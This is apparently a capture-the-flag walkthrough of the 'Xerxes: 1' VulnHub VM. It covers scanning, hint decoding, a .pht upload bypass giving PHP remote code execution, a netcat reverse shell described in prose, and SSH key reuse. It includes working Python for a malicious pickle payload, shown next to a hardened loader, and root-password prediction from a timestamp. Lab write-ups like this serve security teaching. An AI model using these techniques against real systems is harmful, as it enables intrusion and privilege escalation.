Welcome to the Cyber Sploit CTF challenge series. In this article we will solve the “Xerxes: 1” vulnerable VM, where the goal is to compromise the root account.
In this walkthrough we will see how to gain root privileges without relying on any public exploit or exploitation framework, using only enumeration, decoding and a few classic misconfigurations (an extension-blacklist file upload, an unsafe pickle load and a predictable password-generation script).
You can download the VM from the link below.
https://www.vulnhub.com/entry/xerxes-1,58/
List of actions:
- Network scanning
- HTTP service enumeration
- Directory brute-forcing
- Decoding (QR code, base64)
- Finding the hint hidden in an image
- Decoding the Brainfuck program and cracking an MD5 hash
- Capturing the flags in various phases
Network scanning
We will start with the netdiscover tool to find the VM's IP address: run netdiscover on the Kali machine and pick the new host out of its output. In this case our target VM's IP is 172.16.2.103.
Now let's run a network scan with nmap to discover the open ports on the target VM and the services behind them:
nmap -A 172.16.2.103
(-A enables OS and version detection, default scripts and traceroute. It only covers the 1000 most common ports, so add -p- if you want to be sure nothing is listening on a non-standard port.)
The nmap scan shows two open ports on the target VM, 22 and 80, running SSH and HTTP respectively. Let's open the website on port 80 in a web browser.
The page itself gives us nothing relevant, so we move on to the next step.
In this step we will brute-force directories on the web server (with a wordlist-based tool such as dirb or gobuster) and look for any clue that lets us proceed.
The scan result reveals another directory named /dev/.
So let's browse to /dev/ and look at the result in the browser.
We can see that there are multiple links in the footer. Let's click on them one by one and see what each does.
The QR code above appeared the moment we clicked on the "forgot password" link. Let's read the QR code (a phone app or zbarimg will do) and see what it contains.
After decoding the QR code we get a base64-encoded value; decoding that gives the string “look deeper”. This is a hint that something is hidden deeper inside the image itself.
After trying various things with the image we finally used the following method to find the code hidden inside it.
Open the image in GIMP (we used the latest version on a Windows system) and, in the Channels dialog, hide the Red, Green and Blue channels so that only the Alpha channel is visible. The goal is to find pixels whose alpha value differs from the rest. After a long search we found them in the topmost pixel row of the image. Note down each pixel's alpha value in order; the decimal values, which we then convert to ASCII characters (with an online tool, or any scripting language), are:
75 121 115 114 75 121 115 114 87 122 52 114 75 121 115 114 75 121 115 114 75 122 119 116 88 84 52 114 75 121 115 114 76 105 115 117 76 83 48 116 76 83 52 116 76 105 52 61
The resulting ASCII string is itself a base64-encoded value, so we decode it and look inside.
The decoded result is another unreadable string: a program in Brainfuck, an esoteric programming language whose source consists only of the characters + - < > [ ] . and , . This is not encryption, so there is nothing to decrypt; running the program in any Brainfuck interpreter prints its output.
Running it prints the value 45100, which we can use as the password to upload a file. Let's do that.
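The whole chain from the alpha-channel pixels to the upload password can be reproduced offline. The following is an added example (not code from the original write-up): it converts the decimal pixel values listed above to ASCII, base64-decodes the result in strict mode so that any transcription slip raises an error instead of silently producing garbage, and runs the resulting Brainfuck program in a small interpreter. The pixel values are the ones transcribed on this page; the interpreter's 30000-cell tape and step limit are ordinary conventions, not something the challenge specifies.

```python
import base64

# Decimal alpha values as transcribed from the top pixel row of the image above.
PIXEL_VALUES = [
    75, 121, 115, 114, 75, 121, 115, 114, 87, 122, 52, 114, 75, 121, 115, 114,
    75, 121, 115, 114, 75, 122, 119, 116, 88, 84, 52, 114, 75, 121, 115, 114,
    76, 105, 115, 117, 76, 83, 48, 116, 76, 83, 52, 116, 76, 105, 52, 61,
]


def decimals_to_text(values):
    """Turn a list of decimal byte values into the ASCII string they spell."""
    return bytes(values).decode("ascii")


def base64_to_text(s):
    """Decode base64 strictly: a mistyped pixel value becomes an exception
    rather than a plausible-looking but wrong Brainfuck program."""
    return base64.b64decode(s, validate=True).decode("ascii")


def run_brainfuck(program, max_steps=1_000_000):
    """Minimal Brainfuck interpreter: 8-bit wrapping cells, no input.
    Returns the program's output as a str. max_steps stops a malformed
    program that never terminates."""
    # Pre-compute matching brackets so jumps are O(1) and mismatches are caught.
    jump, stack = {}, []
    for i, ch in enumerate(program):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {i}")
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")

    tape = [0] * 30000
    ptr = pc = steps = 0
    out = []
    while pc < len(program):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded; program may not terminate")
        ch = program[pc]
        if ch == ">":
            ptr += 1
        elif ch == "<":
            ptr -= 1
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ".":
            out.append(chr(tape[ptr]))
        elif ch == "[" and tape[ptr] == 0:
            pc = jump[pc]          # skip the loop body
        elif ch == "]" and tape[ptr] != 0:
            pc = jump[pc]          # jump back to the matching '['
        # ',' (input) is not used by this program; anything else is a comment.
        pc += 1
    return "".join(out)


def recover_password(values=PIXEL_VALUES):
    """Full chain: decimal pixels -> ASCII -> base64 decode -> Brainfuck run.
    Returns (brainfuck_program, printed_output)."""
    b64 = decimals_to_text(values)
    program = base64_to_text(b64)
    return program, run_brainfuck(program)


if __name__ == "__main__":
    program, password = recover_password()
    print("base64  :", decimals_to_text(PIXEL_VALUES))
    print("program :", program)
    print("password:", password)
```

The program turns out to be a single multiplication loop (6 × 8 = 48, the ASCII code of '0') followed by small adjustments before each output, which is the usual shape of hand-written Brainfuck that prints a short string.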
I tried to upload an RCE1.php file, but the upload was rejected with “Error: illegal file detected”.
So let's change the file extension to .pht and try again.
This time the file was uploaded successfully. An extension blacklist like this one is a weak control: on older (PHP 5-era) Debian/Ubuntu Apache installs the PHP handler's FilesMatch pattern covers .pht and .phtml as well as .php, so the server still executes our script. Now we go to the upload directory and call the PHP script with a command as its argument to check whether this gives us Remote Code Execution (RCE).
Bingo! The target is vulnerable to RCE: passing cat /etc/passwd as the argument returns the contents of /etc/passwd.
Since we have RCE, we now use netcat to get a reverse shell back to our Kali system: start a netcat listener on Kali, then call the uploaded script from the browser with a netcat reverse-shell command pointed at Kali's IP and the listening port.
As soon as the reverse connection arrives, we run a Python one-liner that spawns a pty, which upgrades the raw connection into a usable (if still limited) shell.
We now have a command-line shell as the xerxes user. Let's look in /home to see which users exist on the system.
According to the output there are three user names: amanpour, curtiz and delacroix. We start checking their home directories, beginning with amanpour.
Here we find a .bash_history file; let's check its content.
Inside the file there is a Python command that generates a new password, so we run the same command in our terminal to obtain that password.
With the password in hand, let's log in as amanpour.
We are successfully logged in as amanpour. Now let's search the whole filesystem for files with the SUID bit set, using find.
Among the results is the file /opt/notes. Let's go into /opt and read it.
Reading notes.py, we see that it uses the pickle module to load a file chosen by the user. pickle is vulnerable to insecure deserialization: a crafted pickle can make the loader call any Python callable with any arguments, so we can execute code of our choice. Since the script loads whatever file we point it at, we create a pickle file whose payload executes “/bin/bash”.
Create the file ‘shell’ in /tmp with that payload.
Then run the notes program and point it at the shell file in /tmp.
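To make the pickle issue concrete, here is an added example that is not the VM's notes.py (whose exact code is not reproduced on this page): a minimal loader with the same flaw, a payload generator of the kind used to build the ‘shell’ file, and a hardened loader that refuses the payload. The payload runs echo pwned instead of /bin/bash so that it is non-interactive; the file name, the command and the loader's shape are assumptions for the demonstration.

```python
import os
import pickle
import subprocess
import tempfile


# --- The flaw, reduced to its essence (constructed; not the VM's notes.py):
# a privileged helper that unpickles a file the user chooses.
def vulnerable_load(path):
    with open(path, "rb") as f:
        return pickle.load(f)  # runs whatever callable the pickle names


# --- Attacker side. An object's __reduce__ tells the unpickler which
# callable to invoke, with which arguments, to "rebuild" the object.
# pickle.load() performs that call, so the callable becomes our payload.
class RunCommand:
    def __init__(self, argv):
        self.argv = argv

    def __reduce__(self):
        # On load the unpickler evaluates subprocess.check_output(self.argv).
        # On the VM the equivalent payload spawned /bin/bash.
        return (subprocess.check_output, (self.argv,))


def write_payload(path, argv):
    """Serialise the payload object to a file; RunCommand itself is never
    stored, only the (callable, args) tuple from __reduce__."""
    with open(path, "wb") as f:
        pickle.dump(RunCommand(argv), f)
    return path


# --- Defender side. Every callable a pickle can invoke is fetched through
# Unpickler.find_class(); refusing all global lookups leaves only plain
# data (str, int, list, dict, ...) loadable.
class NoGlobalsUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def safe_load(path):
    with open(path, "rb") as f:
        return NoGlobalsUnpickler(f).load()


def demo():
    """Build the payload in a temp dir and load it both ways.
    Returns (output of the command the vulnerable loader ran,
             error message from the hardened loader, or None if it did not block)."""
    with tempfile.TemporaryDirectory() as d:
        path = write_payload(os.path.join(d, "shell"), ["echo", "pwned"])
        executed = vulnerable_load(path)  # the command really runs here
        try:
            safe_load(path)
            blocked = None
        except pickle.UnpicklingError as e:
            blocked = str(e)
    return executed, blocked


if __name__ == "__main__":
    executed, blocked = demo()
    print("vulnerable loader ran the payload, output:", executed)
    print("hardened loader rejected it:", blocked)
```

The hardened loader is the right shape when the data format cannot be changed; where it can, replacing pickle with JSON or another data-only format removes the whole class of problem rather than fencing it.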
The moment the payload is loaded we get a shell. Running id in it shows that amanpour is a member of the group curtiz, so we go to curtiz's home directory. Among its contents is a file named notes, and its content hints at logging in with an account called “Marie”.
Following the hint, we check /etc/passwd for any related information.
It turns out that Marie is the first name of the user delacroix, and that this account has an unusual login shell, /bin/delacroix.
Let's look at the content of the /bin/delacroix binary with the strings utility.
Among the output there is an MD5 hash. MD5 is a one-way hash, so it cannot be decrypted, but it can be cracked by looking it up in a precomputed list or brute-forcing candidate passwords; doing so gives the plaintext “VonBraun”. Let's try that as the password for SSH access as delacroix.
But we are unable to log in. Going back to /home/curtiz we find a file named id_rsa, an SSH private key. Let's copy its content and save it on our Kali machine.
Back at the Kali prompt, log in over SSH as delacroix using the id_rsa private key file.
Note: first restrict the key's permissions (chmod 400 id_rsa) on the Kali system; the OpenSSH client refuses to use a private key that is readable by other users.
We are now in delacroix's home directory. Let's see its contents.
There are two files, check.sh and generate.sh. Let's read them one after another and work out what they do.
check.sh
generate.sh
check.sh prints a customised login message, and generate.sh creates a new .last file and derives an MD5 hash from that file's timestamp, which is then used as the root password.
So we need the MD5 hash of the .last file's creation time. First we read the file's timestamp with the stat command.
With the timestamp in hand we compute its MD5 hash to obtain the password. Be careful to hash exactly the string generate.sh hashes (same stat output format, same trailing newline or lack of one): a differently formatted copy of the same timestamp yields a completely different digest and the password will not work.
The resulting hash is the root password; we use it to switch to root and go looking for the flag.
Great! We have a root shell. Inside /root we find the flag file.
Checking the file type shows it is a PNG image. We transfer it to our Kali machine with netcat: on Kali, listen on port 5555 and redirect whatever arrives into a file; on the target, pipe the PNG into netcat pointed at Kali's IP and port 5555. Then open the PNG in an image viewer.
Boom! We have captured the flag from the target machine.
Thank you for reading this far. If you still have any doubts, please write them in the comments section below. Happy Hacking!